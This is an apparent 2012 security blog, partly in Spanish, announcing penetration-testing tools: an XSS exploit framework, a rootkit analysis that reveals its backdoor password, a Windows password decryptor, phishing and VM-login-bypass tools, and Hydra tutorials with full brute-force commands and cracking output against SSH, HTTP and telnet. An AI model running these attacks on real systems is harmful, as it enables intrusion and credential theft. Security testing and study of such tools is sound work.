Thursday, November 29, 2012

[Xenotix] XSS Exploit Framework 2013 v2 Released

Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. This tool can inject codes into a webpage which are vulnerable to XSS. It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader and a XSS Reverse Shell. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.


  • Built in XSS Payloads
  • XSS Key logger
  • XSS Executable Drive-by downloader
  • Automatic XSS Testing
  • XSS Encoder
  • XSS Reverse Shell (new)
Download Xenotix XSS Exploit Framework 2013 v2

Wednesday, November 28, 2012

Google Chrome 23.0.1271.91 corrige 7 vulnerabilidades

Google ha actualizado la nueva rama 23 de su navegador Chrome con la versión 23.0.1271.91, para todas las plataformas (Windows, Mac, Linux y Chrome Frame) que corrige siete nuevas vulnerabilidades con un nivel de gravedad medio-alto.
Las vulnerabilidades específicas de Chrome son las siguientes según el nivel de impacto:
  • Dos vulnerabilidades marcadas con un impacto alto: CVE-2012-5133 descubierta por @miaubiz y relacionada con los filtros gráficos SVG, y la otra CVE-2012-5134, relacionada con la librería libxml y reportada por Jüri Aedla (Google Chrome Security Team).
  • Tres de carácter medio: CVE-2012-5130 a través del motor grágico 2D "Skia", descubierta por Atte Kettunen del equipo universitario OUSPG. CVE-2012-5135 que afectaba al módulo de impresión, reportada por Fermín J. Serna (Google Security Team). Y el CVE-2012-5136, relacionada con la gestión de elementos de entrada HTML (Google Chrome Security Team).
  • Finalmente, una vulnerabilidad de gravedad baja (CVE-2012-5132) relacionada con el método de transmisión "Chunked transfer encoding" y descubierta por Attila Szász.
Google recuerda como viene siendo habitual, que parte de las vulnerabilidades solucionadas fueron detectadas a través de su proyecto público de detección de errores en memoria para aplicaciones escritas en C/C++: AddressSanitizer
Esta actualización está disponible a través del propio navegador vía Chrome Update automáticamente o desde el sitio oficial de descarga:
Más información:
Stable Channel Release and Beta Channel Update

Saturday, November 24, 2012

[TOR v0.2.3.25] Virtual Network Tunneling Tool

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs).

Changes: This release reduces directory overhead, provides enormous crypto performance improvements for fast relays on recent hardware, a new v3 TLS handshake protocol that can better resist fingerprinting, support for protocol obfuscation plugins, better scalability for hidden services, IPv6 support for bridges, performance improvements like allowing clients to skip the first round-trip on the circuit ("optimistic data") and refilling token buckets more often, a new "stream isolation" design to isolate different applications on different circuits, and many stability, security, and privacy fixes. 

Linux Kernel 2.6.x /proc Rootkit Backdoor (Unix/Darbe-A)

Linux Kernel 2.6.x /proc rootkit(Unix/Darbe-A)


Unix/Darbe-A is a new kernel rootkit based /proc file system., modification is made in order to support kernel 2.6.x



analiz@server:/tmp$ uname -a
Linux server 3.2.0-32-generic #51-Ubuntu SMP Wed Sep 26 21:32:50 UTC 2012 i686 i686 i386 GNU/Linux

analiz@server:/tmp$ lsmod
Module Size Used by
security 13046 0 <--- Linux Kernel Module ??? What is the task?
vsock 47098 0
rfcomm 37291 4
bnep 17711 2

analiz@server:/tmp$ ./kontrol

Sistem yetki unitesi

Kullanim: ./kontrol <sifre>

What is the meaning of the word "sifre"? - it is not an english word? ~<sifre> comes from the Turkish. In English it means "password"

analiz@server:/tmp$ gdb ./kontrol
GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2) 7.4-2012.04

(gdb) r sifre <- run
Starting program: /tmp/kontrol sifre
Bir Bulutla KI$ Gelmez! < -- Turkish sentence
[Inferior 1 (process 3314) exited with code 01] <-----------Anti debug ???

analiz@server:/tmp$ ./kontrol password

Sifre yanlis! <--? Wrong Password.

analiz@server:/tmp$ objdump -s ./kontrol | grep sifre
80c5b30 3c736966 72653e20 0a0a2000 66616272 <sifre> .. .fabr <--??* fabr??

analiz@server:/tmp$ objdump --start-address=0x80c5b30 --stop-address=0x80c5b50 -s ./kontrol

./kontrol: file format elf32-i386

Contents of section .rodata:
80c5b30 3c736966 72653e20 0a0a2000 66616272 <sifre> .. .fabr <---- fabrika ??
80c5b40 696b6100 0a536966 72652079 616e6c69 ika..Sifre yanli

analiz@server:/tmp:/tmp$ ./kontrol fabrika <--- pass is fabrika
# id <--- ?? upss.. #root#
uid=0(root) gid=0(root) groups=0(root)

Linux Kernel Module(security.ko) has been injected into the system, control program(./kontrol fabrika) makes a normal user to root.

Tuesday, November 20, 2012

[Network Password Decryptor v3.0] Tool to Recover Network Passwords

Network Password Decryptor is the free tool to instantly recover network passwords stored in the 'Credential Store' of Windows.

Windows 'Credential Store' provides the framework for storing various network authentication based passwords in secure encrypted format.
 Not only Windows uses it to store network authentication passwords, but also other applications such as Outlook, Windows Live Messenger, Remote Destktop, Gmail Notifier etc uses it for storing their login passwords. These network passwords are saved only when the user has selected 'Remember Password' option during login time.

These network passwords are stored in encrypted format and even administrator cannot view these passwords. Also some type of passwords cannot be decrypted even by administrators as they require special privileges. In this context, NetworkPasswordDecryptor makes it easy to detect and decrypt all these stored network passwords from Credential Store.

Current version v3.0 supports network password recovery from Windows 8.

NetworkPasswordDecryptor works on wider range of platforms starting from Windows XP to latest operating system, Windows 8.

Here are the screenshots of NetworkPasswordDecryptor
Screenshot 1: NetworkPasswordDecryptor showing all the recovered passwords from Windows 8.

Screenshot 2: Report showcasing all the recovered network passwords on Windows 8 system

[Hydra] BruteForcing FTP/Website + 14 Millones de Password

Según OWASP el Brute Forcing consiste en enumerar sistemáticamente todos los posibles candidatos para la solución y comprobar si cada candidato satisface la declaración del problema. En las pruebas de penetración hacia aplicaciones web, el problema al que nos vamos a enfrentar con la mayor parte es muy a menudo con la necesidad de tener una cuenta de usuario válida para acceder a la parte interna de la aplicación.
Pero para realizar un BruteForcing seguro y rapido, siempre es necesario contar con una buena lista de contraseñas para que el trabajo sea mas eficiente, para tal caso y pensando en ustedes voy a compartir una lista de 14 millones de Password's para el respectivo crackeo de Password's ya sea en Servidores Web's, Servicios FTP, SSH y Router's, que pueden ser usados con el John The Riper, Hydra u otras herramientas que se utilizan para el BruteForcing en cualquier sistema operativo.

Hydra es una herramienta de fuerza bruta que puede ser usada para los siguientes protocolos:
  • afp
  • cisco
  • cisco-enable
  • cvs
  • firebird
  • ftp
  • http-get
  • http-head
  • http-proxy
  • https-get
  • https-head
  • https-form-get
  • https-form-post
  • icq
  • imap
  • imap-ntlm
  • ldap2
  • ldap3
  • mssql
  • mysql
  • ncp
  • nntp
  • oracle-listener
  • pcanywhere
  • pcnfs
  • pop3
  • pop3-ntlm
  • postgres
  • rexec
  • rlogin
  • rsh
  • sapr3
  • sip
  • smb
  • smbnt
  • smtp-auth
  • smtp-auth-ntlm
  • snmp
  • socks5
  • ssh2
  • svn
  • teamspeak
  • telnet
  • vmauthd
  • vnc


xHydra se encuentra disponible en la suite de BackTrack y se ubica en: BackTrack - Privilege Escalation - Password Attacks - Online Attacks - Hydra-gtk.



Esta tabla permite especificar el target y el protocolo para atacar.

  • Usar "Single Target" para especificar un host único.
  • Usar "Target List" para especificar un archivo que contiene una lista de hosts.
  • Eventualmente utilizar "Port" para especificar el puerto para atacar (si no estándar).
  • Seleccione el protocolo en el "Protocol" en la lista desplegable.
Output Options:
  • Use SSL: seleccione esta opción si utiliza el protocolo SSL.
  • Show attemps: muestra todos los intentos de fuerza bruta en la tabla Start.
  • Be verbose: muestra más información en la tabla Start.
  • Debug: muestra información de depuración en la tabla Start.

Esta tabla permite especificar las credenciales que se utilizarán para el ataque de fuerza bruta.
  • Usar "Username" para especificar un nombre de usuario.
  • Usar "Username List" para especificar una lista de nombres de usuario desde un archivo.
  • Usar "Password" si ya sabe la contraseña (poco frecuente).
  • Usar "Password List" para especificar un archivo en el que ha guardado todas las contraseñas a probar.
Colon separated file:
  • Usar "Colon separated file": utilice esta opción si prefiere usar un archivo en el inicio de sesión y las contraseñas se especifican en un archivo único con dos puntos como separador.
  • Try login as password: utilice esta opcion para el intento y combinacion de logins y contraseñas de su archivo.
  • Try empty password: se intentará utilizar contraseñas vacías, además de su archivo de contraseñas.
Esta tabla permite ajustar con precisión el ataque de fuerza bruta.
Performance Options:
  • Number of Tasks: número de tareas en paralelo (threads). Por defecto: 16
  • Timeout: tiempo de espera máximo de un proceso de ataque que está esperando una respuesta desde el objetivo. Por defecto: 30
  • Exit after first found pair: xHydra se cerrará automáticamente cuando un usuario válido y contraseña ha sido encontrado.
Use a HTTP/HTTPS Proxy:
  • No proxy / HTTP Method / CONNECT Method: permite especificar el tipo de proxy.
  • Proxy: dirección proxy (por ejemplo
  • Proxy needs authentication: utilizar para especificar un nombre de usuario/contraseña.
  • "Username": nombre de usuario para la autenticación del proxy.
  • "Password": contraseña que se utilizará para la autenticación del proxy.

Algunos servicios tienen opciones específicas, por lo tanto esta tabla permite especificar estas opciones.
  • http-proxy module: URL para conectarse a través del proxy.
  • http / https url: URL protegida a la que desea acceder.
  • Cisco Enable, Login for Cisco device: contraseña para el dispositivo de Cisco.
  • LDAP DN: el DN Scope de LDAP para la autenticacion.
  • sapr3 client id: identificación del cliente que quieres atacar (entre 1 y 99).
  • CVS/SVN Repository: directorio de la CVS o SVN.
  • Telnet - Successful Login String: introduzca la cadena de retorno para un login exitoso.
  • SNMP: seleccionar las opciones por default.
Esta ficha muestra los resultados de xHydra (intentos exitosos, credenciales detallados e información de depuración). También controla la herramienta (start, stop, save, clear output).
  • Output: Toda la información sobre el proceso de fuerza bruta.
  • Start: inicia el ataque con la información proporcionada.
  • Stop: Detiene el ataque.
  • Save output: permite guardar el resultado en un archivo.
  • Clear output: borra los resultados obtenidos.
La lista de 14 millones de Password's puede ser descargado desde el siguiente enlace: Download 14 Million Password's

Sunday, November 18, 2012

[VSD] (Virtual Section Dumper) Just another Virtual Section Dumper for Windows Processes

What's VSD?

VSD (Virtual Section Dumper) is intented to be a tool to visualize and dump the memory regions of a running 32 bits or a 64 bits process in many ways. For example, you can dump the entire process and fix the PE Header, dump a given range of memory or even list and dump every virtual section present in the process.
Usage of VSD can be found here


VSD x86

Main window

Loaded modules




VSD x64

Latest changes

VSD x86

Version: 2.1 (18/11/2012)
  • Added "Ignore unnamed objects" in the window handles.
  • Added "Set Priority" feature in order to set the priority of a given process. issue 8
  • Added "Suspend process" and "Resume process" features. issue 10
  • Added "Suspend all threads before dumping". Using this option you can suspend the execution of a given process before to dump it. issue 5
  • Added updatevsd.exe. More information can be found here
Version: 2.0 (01/04/2012)
  • Added a menu bar.
  • Added a module list viewer.
  • Added Dump Full and Dump Partial over a specific module.
  • Added sorting feature in the module list viewer.
  • Added a handle list viewer.
  • Added sorting feature in the handle list viewer.
  • Added a thread list viewer.
  • Added Resume, Terminate and Suspend functions in the thread list viewer.
  • Added the "Patch" feature.
  • Bugfixes in some functions.
  • Code refactoring in some functions. The code still needs a lot of improvements :P
Version: 1.1
  • Fixed a bug in the PastePEHeader() function when calculating the offset of the original PE Header.
Version: 1.0
  • First stable release (I hope so :)

VSD x64

Version: 1.0
  • First stable release. 

Download Virtualsectiondumper

Friday, November 16, 2012

[ISME v0.7] IP Phone Scanning Made Easy

ISME is a small framework to test IP phones from several editors. It can gather information from IP phone infrastructures, test their web servers for default login/password combinations, and also implement attacks against the systems. ISME has been written in perl with a perl/Tk interface to provide a portable and easy to use tool. Full documentation is also provided.

Initially intended as a scanner dedicated to Cisco IP Telephony solution, ISME has evolve in a small framework to test IP Phones from several editors.

Nevertheless, the four goals I had in mind at the beginning are still present:
  • Provide a simple tool to use,
  • Trying to create something new dedicated to ip telephony,
  • Targeting enterprise solutions,
  • Exploiting LAN connexion possibilities.

Download ISME v0.7 (Zip - 5 Mb) 
isme_v0.7 documentation (PDF - 3.4 Mb)

V0.7 – 15/11/2012
· Tool: Add Cisco phone logout mobility feature abuse.
Version follow up

· Tool: Implement a module to detect the use of default Login/password on embedded
web interface from Mitel phones.
· Exploit: Add Aastra ip phone information disclosure (OSVDB-ID: 72941/EDB-ID
· Exploit: Add Avaya Ip Office Linux voicemail password file data disclosure.
· Exploit: Add the script providing phone call and remote taping on SNOM phones.
· Exploit: Add Mitel AWC unauthenticated command execution (OSVDB-ID:
69934/EDB-ID 15807).
V0.6 – 30/08/2012
· Implement code to exploit Polycom IP Phones data disclosure vulnerability (OSVDBID:
· Implement code to exploit Polycom IP Phones DoS through web interface (OSVDBID:
· Implement a module to detect Polycom SoundPoint IP Phones use of default
Login/password and unprotected web interface.
· Add the capacity to scan a full subnet for Aastra & SNOM default login/password
search. Capacity to save results in text files has been added also.
· Add an integrated graphical module for Protos SIP in ISME (need java to work).
· Cisco phone ringer & forwarder support new types of IP Phone:
· Due to some problems met by users at the installation, I finally come back to an install
process mainly based on CPAN.
V0.5 – 06/08/2012
· Add SIP Flooding attacks (Invite, Register, Options)
· Add TCP SYN Flood attack
· Update installer
· Change menu presentation
V0.4 – 12/06/2012
· Add Cisco phone attacks (ringer & forwarder – skinny)
· Add Lan & Servers attacks (DHCP Starvation & DNS Subnet resolver)
V0.3 – 12/02/2012
· All kind of subnets are now support. ISME is no more limited to “/24”. Take care, it is
done with the utilization of a new library. Be sure to install it (or load the installation
script which add been adapted) before launching this new version.
· Add the capacity to detect default password on SNOM IP Phones.
V0.2 – 03/01/2012
· Add an installer for all the perl modules.
· Add the capacity to detect default password on Aastra IP Phones.
V0.1 – 20/12/2011
First release of ISME script.

Thursday, November 15, 2012

[Hydra] Ataques de Fuerza Bruta

Instalación de THC Hydra

Para instalar THC Hydra solamente es necesario descargar la ultima versión disponible desde:

Descargar el fichero tar.gz y descomprimirlo en un directorio.
Finalmente, en dicho directorio, ejecutar:
hydra-6.1-src# ./configure
hydra-6.1-src# make
hydra-6.1-src# make install

En este caso, es necesario tener instalado el paquete build-essentials, para ejecutar el comando “make” En el caso de ataques contra el protocolo SSH, es necesario tener instaladas las librerías libssl-dev y libgtk2.0-dev

Con los comandos anteriores se compila e instala el programa para posteriormente ser usado.

Uso de XHYDRA:

XHydra es una aplicación gráfica de usuario (GUI) que permite hacer uso de todas las características que dispone Hydra, es una herramienta que se instala junto con las librerías de hydra y permite entender mucho mejor las opciones disponibles en la herramienta en cada una de las pestañas disponibles en la aplicación, ademas, en la parte de abajo indica el comando que se llevará a cabo de acuerdo a las opciones indicadas, a continuación se describen cada una de las pestañas de la aplicación:


Se declaran los objetivos del ataque, pueden ser de uno a muchos, definiendo las opciones Single Target o Target List, en el caso de target list se define un fichero con los objetivos del ataque, también se permite establecer que el ataque se debe ejecutar preferentemente sobre IPV6 en lugar de IPV4. La opción port define el puerto en el cual se encuentra escuchando el servicio que se desea atacar, por ultimo se define el protocolo a atacar, entre los que se destacan, SSH, cisco, cvs, http-head, http-get, http-proxy, https-head, https-form-get, https-form-post, mysql, pop3, smb, svn, etc.

En esta pestaña también se pueden declarar las opciones de salida del comando, permitiendo un nivel mucho más fino de logs, para ver todo lo que hydra ejecuta en cada momento, las opciones disponibles en esta área son: Use SSL, Be Verbose, Show Attempts y Debug.
Hasta este punto la estructura del comando hydra puede contener los siguientes valores:

Múltiples Objetivos:

hydra -M <DIR_WORDLIST>/targets.lst [protocolo: ssh, ssh2, smb, rlogin, postgres, mysql, svn, cvs, socks5, telnet, vnc, ftp, cisco, http-proxy, http-get, http-head, imap, ldap2, ldap3, …] -s puerto
hydra -M /targets.lst ssh -s 22
Único Objetivo:
hydra [IP_TARGET] [protocolo: ssh, ssh2, smb, rlogin, postgres, mysql, svn, cvs, socks5, telnet, vnc, ftp, cisco, http-proxy, http-get, http-head, imap, ldap2, ldap3, …] -s puerto
hydra ssh -s 22

Esta pestaña es la mas importante, dado que aquí se definen los atributos obligatorios para la ejecución del comando hydra, a saber, un nombre de usuario único/listado de usuarios y un password único/listado de passwords. En el caso que se trate de usuario o password simple, solamente basta con indicarlo en los campos de texto, en el caso de que se cuente con un diccionario para usuarios o passwords debe indicarse la ruta absoluta donde se encuentran ubicados dichos archivos, puede darse el caso en el que contemos con un usuario valido y sobre este, ejecutamos el ataque de fuerza bruta con un diccionario de passwords en busca de un login exitoso, al igual que podríamos tener un password valido y definir un listado de usuarios (aunque es un caso muy poco frecuente). Por otro lado podemos definir la estructura de dichos wordlist en el caso de que el tenga cada entrada separada por comas, se usa la opción “Use colon separated file”, de otra forma cada entrada se ubica en cada linea del archivo cuyo delimitador es simplemente el salto de linea.

Finalmente se pueden definir las opciones de “Try Login as a Password” y “Try Empty password”

Hasta este punto el comando puede tener la siguiente estructura:

Usuario Único/Password Único:
hydra {OPCIONES_TAB_TARGET} -l nombreUsuario -p password
hydra {OPCIONES_TAB_TARGET} -l admin -p clavesegura
Usuario Único/Listado de Password
hydra {OPCIONES_TAB_TARGET} -l admin -P <DIR_WORDLIST>/file.lst
hydra {OPCIONES_TAB_TARGET} -l admin -P /home/wordlistUser.lst
Listado Usuarios/Password Único
hydra {OPCIONES_TAB_TARGET} -L <DIR_WORDLIST>/file.lst -p password
hydra {OPCIONES_TAB_TARGET} -L /home/wordlistUser.lst -p clavesegura
Listado Usuarios/Listado Passwords
hydra {OPCIONES_TAB_TARGET} -L /home/wordlistUser.lst -P <DIR_WORDLIST>/file.lst
hydra {OPCIONES_TAB_TARGET} -L /home/wordlistUser.lst -P <DIR_WORDLIST>/pass.lst
Fichero separado por comas
hydra {OPCIONES_TAB_TARGET} -C /home/usersandpass.lst
Intentar login como password:
Intentar password vació:


Son opciones para mejorar el desempeño del ataque, sin embargo no deben de ser tomadas a la ligera en especial con el establecimiento de valores muy elevados, esto debido a que muchos protocolos detectan este tipo de ataques cuando se hacen de forma muy repetitiva o en otros casos podríamos provocar denegación del servicio, inclusive algunos protocolos habilitan lo que es conocido como “listas negras” donde se registra la dirección del atacante y ante los posteriores intentos de conexión  por parte de dicha IP la petición es automáticamente rechazada.
Dentro de las opciones de performance encontramos la opción de numero de tareas, que indica el número de hilos en ejecución de hydra, este valor establece un nuevo proceso hydra en ejecución, por lo tanto un valor muy alto puede dañar considerablemente el desempeño general del ordenador desde donde se ejecute este comando, llegando inclusive a consumir absolutamente todos los recursos del mismo, por lo tanto es un valor del que no se debe abusar (a menos que se cuente con un ordenador muy robusto en terminos de hardware y capacidad de procesamiento). Por otro lado la opción de TimeOut define el tiempo de espera de cada una de las peticiones en segundos, en el caso de que este tiempo se alcance automáticamente el proceso de hydra finaliza su ejecución para la iteración correspondiente al ataque que a alcanzado el tiempo máximo, es decir, este tiempo en segundos será el tiempo que el proceso de Hydra esperará antes de lanzar la siguiente entrada de usuario/clave del ataque, este valor también puede afectar negativamente el desempeño del ordenador, en especial si se utiliza junto con un valor muy alto para el numero de tareas.
Finalmente es posible establecer valores de autenticación sobre un proxy HTTP u otro, donde se debe especificar la dirección del proxy y si esté requiere autenticación los valores correspondientes a la clave y el usuario.

En el caso de utilizar un proxy, este puede definirse de manera persistente en las varables de entorno: HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT y HYDRA_PROXY_AUTH. Algunos valores validos para estas variables:


Numero de tareas

hydra {OPCIONES_TAB_TARGET} {OPCIONES_USER_PASS} -w numero_segundos

Aquí se definen algunas opciones adicionales especificas para algunos de los protocolos soportados, estas opciones definen características obligatorias para la correcta ejecución del ataque contra un objetivo. Estas opciones especificas son:

Indica la ruta donde se establece el modulo proxy para realizar los ataques.

http /https url
Indica una ruta normalmente protegida por control de acceso, ya sea por HTTP o HTTPS.
Cisco enable, Login for Cisco Device
Valor de clave para un router cisco.

Indica la raíz del directorio de LDAP donde se intenta ejecutar un ataque de fuerza bruta, esta opción es valida para protocolos ldap2 y ldap3

Diferentes tipos de ataques contra estructuras Samba, los valores posibles son: cuentas locales, cuentas de dominio, Interpretación de passwords como NTLM hashes.

Indicar la raíz del directorio CVS o SVN, por defecto es trunk.

El el caso de un login exitoso, el mensaje que se debe de enseñar en la consola

Finalmente en la pestaña de Start se puede iniciar el ataque con todas las opciones establecidas, teniendo la posibilidad de detener el ataque, almacenar la salida en un fichero de texto y visualizarla en una área de texto habilitada para dicho fin.


Aunque con XHYDRA se definen la mayoría de las opciones disponibles en la herramienta, existen otra serie de opciones adiciones que no se contemplan y que pueden ser utilizadas directamente desde la consola de comandos, el listado total de las opciones actualmente disponibles (versión 6.1 a la hora de escribir este documento)
hydra -h
Hydra v6.1 [] (c) 2011 by van Hauser / THC <>
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
[-4|-6] server service [OPT]
-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, “n” for null password, “s” try login as pass
-C FILE colon separated “login:pass” format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3 imap smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth pcanywhere teamspeak sip vmauthd firebird ncp afp
OPT some service modules need special input (see README!)
En ocasiones, los ataques son cancelados por multitud de razones, hydra en estos casos genera un fichero llamado “hydra.restore” que contiene la última sesión ejecutada por THC Hydra, de este modo es posible continuar con ataques inconclusos partiendo desde el ultimo estado del ataque, para esto se emplea la opción -R

Ataques de fuerza bruta contra SSH

Para realizar un ataque contra SSH es obligatorio tener instaladas las librerías libssl-dev ylibgtk2.0-dev, ya que son dependencias que utiliza hydra para la ejecución de ataques contra ssh, entre otros protocolos seguros.
hydra -l adastra -P /home/adastra/UTILITIES/userPass.lst -t 2 -vV -s 4321 ssh
Hydra v6.1 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra ( starting at 2011-04-05 21:29:19
[DATA] 2 tasks, 1 servers, 5 login tries (l:1/p:5), ~2 tries per task
[DATA] attacking service ssh on port 4321
[VERBOSE] Resolving addresses … done
[ATTEMPT] target – login “adastra” – pass “admin” – child 0 – 1 of 5
[ATTEMPT] target – login “adastra” – pass “root” – child 1 – 2 of 5
[ATTEMPT] target – login “adastra” – pass “hanyn” – child 0 – 3 of 5
[ATTEMPT] target – login “adastra” – pass “user” – child 1 – 4 of 5
[4321][ssh] host: login: adastra password: hanyn
[VERBOSE] Skipping current login as we cracked it
[STATUS] attack finished for (waiting for children to finish)
Hydra ( finished at 2011-04-05 21:29:23

Ataques de fuerza bruta contra HTTPS

Algunos sitios se encuentran restringidos con mensajes de usuario y clave contenidos en la propia petición, a diferencia de aquellos que se enseñan al usuario a modo de formulario web con usuario y clave, este tipo de autenticación viaja en método get, sin embargo no se pueden ver las credenciales en texto plano en la barra de navegación dado que la comunicación viaja en forma segura por medio del protocolo HTTPS, sin embargo, tanto como si se trata de un formulario web, como de un popup de autenticación, hydra permite atacar ambos mecanismos de la misma forma:
hydra -l 1234 -P /home/adastra/UTILITIES/userPass.lst -t 2 -vV -s 80 http-get -m /passwords.html
Hydra v6.1 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra ( starting at 2011-04-05 21:44:58
[DATA] 2 tasks, 1 servers, 5 login tries (l:1/p:5), ~2 tries per task
[DATA] attacking service http-get on port 80
[VERBOSE] Resolving addresses … done
[ATTEMPT] target – login “1234″ – pass “admin” – child 0 – 1 of 5
[ATTEMPT] target – login “1234″ – pass “root” – child 1 – 2 of 5
C1:GET /passwords.html HTTP/1.0
Authorization: Basic MTIzNDphZG1pbg==
User-Agent: Mozilla/4.0 (Hydra)
C1:GET /passwords.html HTTP/1.0
Authorization: Basic MTIzNDpyb290
User-Agent: Mozilla/4.0 (Hydra)
S:HTTP/1.1 401 Unauthorized
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 01 Jan 2000 10:15:39 GMT
WWW-Authenticate: Basic realm=”DSL Router”
Content-Type: text/html
Connection: close
<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR=”#cc9999″><H4>401 Unauthorized</H4>
Authorization required.
<ADDRESS><A HREF=””>micro_httpd</A></ADDRESS>
[ATTEMPT] target – login “1234″ – pass “admin” – child 0 – 3 of 5
C1:GET /passwords.html HTTP/1.0
Authorization: Basic MTIzNDp1c2Vy
User-Agent: Mozilla/4.0 (Hydra)
S:HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 01 Jan 2000 10:15:39 GMT
Content-Type: text/html
Connection: close
[80][www] host: login: 1234 password: admin
[VERBOSE] Skipping current login as we cracked it
[STATUS] attack finished for (waiting for children to finish)
Hydra ( finished at 2011-04-05 21:44:59
Anteriormente en el comando se ha especificado la opción -m indicando la pagina hacia la cual queremos acceder,

Ataques de fuerza bruta contra TELNET

Del mismo modo que con cualquier servicio que requiera autenticación para realizar una conexión, si la maquina objetivo tiene el servicio de telnet activo, es susceptible de ataques de fuerza bruta con el fin de obtener un login exitoso en base a un diccionario de usuarios y claves:
hydra -l 1234 -P /home/adastra/UTILITIES/userPass.lst -t 2 -vV -s 23 telnet
Hydra v6.1 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra ( starting at 2011-04-05 21:56:32
[DATA] 2 tasks, 1 servers, 5 login tries (l:1/p:5), ~2 tries per task
[DATA] attacking service telnet on port 23
[VERBOSE] Resolving addresses … done
[ATTEMPT] target – login “1234″ – pass “admin” – child 0 – 1 of 5
[ATTEMPT] target – login “1234″ – pass “root” – child 1 – 2 of 5
[ATTEMPT] target – login “1234″ – pass “admin” – child 0 – 3 of 5
[ATTEMPT] target – login “1234″ – pass “user” – child 1 – 4 of 5
[23][telnet] host: login: 1234 password: admin
[VERBOSE] Skipping current login as we cracked it
[STATUS] attack finished for (waiting for children to finish)
Hydra ( finished at 2011-04-05 21:56:32

Wednesday, November 14, 2012

[VMInjector] DLL Injection tool to unlock guest VMs

Overview: VMInjector is a tool designed to bypass OS login authentication screens of major operating systems running on VMware Workstation/Player, by using direct memory manipulation.
VMInjector is a tool which manipulates the memory of VMware guests in order to bypass the operation system authentication screen.

VMware handles the resources allocated to guest operating systems, including RAM memory. VMInjector injects a DLL library into the VMWare process to gain access to the mapped resources. The DLL library works by parsing memory space owned by the VMware process and locating the memory-mapped RAM file, which corresponds to the guest’s RAM image. By manipulating the allocated RAM file and patching the function in charge of the authentication, an attacker gains unauthorised access to the underlying virtual host.

VMInjector can currently bypass locked Windows, Ubuntu and Mac OS X operation systems.

The in-memory patching is non-persistent, and rebooting the guest virtual machine will restore the normal password functionality.

Attacking Scenarios:
VMInjector can be used if the password of a virtual host is forgotten and requires reset.

Most usually, this tool can be used during penetration testing activities, when access to a VMWare host is achieved and the attacker is looking to gain additional access to the guests running in such host.

  • Windows machine (with administrative access);
  • VMware workstation or player edition;
  • A locked guest VM;
VMInjector consists of 2 parts:
  • The DLL injection application (python script or provided converted executable)
  • DLL library (x86 and x64)
The tool supports both x86 and x64 bit architectures by providing both DLLs. One may use his own DLL injector to select the guest virtual machine running on the host.
In order to run the tool, execute the VMInjector (32 or 64) executable provided from the command line as shown in figure 1.

  Figure 1: List of running guest machines running.

VMWare runs each guest in a different process. VMInjector needs to be pointed to the process running the guest which requires bypass. Once the user chooses a process, it will inject the DLL into the chosen target.
Once the DLL is injected, the user will need to specify the OS, so that the memory patching can be accomplished, as shown in Figure 2.
 Figure 2: Searching for OS signature in memory and patching.
Tool and Source Code:
The tool executable and source code can be found on GitHub (

Saturday, November 10, 2012

[PwnStar] Version with new Exploits

A bash script to launch a Soft AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing/phishing. Can act as multi-client captive portal using php and iptables.  Launches classic exploits such as evil-PDF. De-auth with aireplay, airdrop-ng or MDK3.

Changes and New Features
  • “hotspot_3″ is a simple phishing web page, used with basic menu option 4.
  • “portal_simple” is a captive portal which allows you to edit the index.html with the name of the portal eg “Joe’s CyberCafe”. It is used for sniffing.
  • “portal_hotspot3″ phishes credentials, and then allows clients through the portal to the internet
  • “portal_pdf” forces the client to download a malicious pdf in order to pass through the portal
Updated feature list:
  • captive-portal with iptables and php
  • more php scripts added
  • exploits added
  • mdk3 and airdrop deauth
General Features :
  • manage interfaces and MACspoofing
  • set up sniffing
  • serve up phishing or malicious web pages
  • launch karmetasploit
  • grab WPA handshakes
  • de-auth clients
  • manage IPtables

Download Here

[PwnPi v2.0] A Pen Test Drop Box distro for the Raspberry Pi

PwnPi is a Linux-based penetration testing dropbox distribution for the Raspberry Pi. It currently has 114 network security tools pre-installed to aid the penetration tester. It is built on the debian squeeze image from the raspberry pi foundation’s website and uses Xfce as the window manager

Login username and password is root:root

Tools List:

Download Here

[NetSleuth] Open source Network Forensics And Analysis Tools

NetSleuth identifies and fingerprints network devices by silent network monitoring or by processing data from PCAP files.

